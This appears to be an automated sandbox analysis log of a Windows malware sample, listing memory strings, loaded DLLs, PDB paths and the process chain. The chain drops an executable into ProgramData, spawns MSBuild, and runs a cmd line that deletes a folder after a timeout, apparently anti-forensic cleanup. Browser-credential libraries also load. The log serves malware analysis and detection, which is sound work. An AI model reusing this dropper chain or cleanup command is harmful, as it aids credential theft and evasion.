Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864080722.0000000003305000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864176505.000000000331C000.00000004.00000020.00020000.00000000.sdmp, ECFHJK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Virustotal: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe "C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"
Source: C:\ProgramData\EHDHIDAEHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\EHDHIDAEHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe" Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe Section loaded: mscorjit.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206774883.000000006C30D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: minelabfoto.pdb( source: mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source: Binary string: minelabfoto.pdb source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr
Source: Binary string: PE.pdbH] source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\kfqXL.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.000000000426C000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2098035068.0000000005634000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: softokn3.pdb@ source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source: Binary string: PE.pdb source: EHDHIDAEHC.exe, 00000004.00000002.2092269679.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, EHDHIDAEHC.exe, 00000004.00000002.2097766953.00000000053B0000.00000004.08000000.00040000.00000000.sdmp
